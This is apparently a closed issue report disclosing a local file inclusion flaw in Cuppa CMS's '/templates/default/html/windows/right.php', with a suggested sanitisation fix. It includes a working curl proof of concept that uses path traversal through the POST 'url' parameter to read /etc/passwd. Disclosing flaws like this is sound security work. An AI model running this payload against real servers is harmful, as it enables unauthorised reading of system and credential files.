Closed
Description
Cuppa CMS suffers from local file inclusion vulnerability in '/templates/default/html/windows/right.php' script using $_POST['url'] parameter.
Using the following exploit it is possible to include arbitrary server file:
curl -X POST "http://IP/cuppa/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../etc/passwd"
PoC:
Possible solution: $_POST['url'] should be sanitized against truncation (../ or ..\ , etc...).
Disclosure date: 6th January, 2022
Metadata
Assignees
Labels
No labels
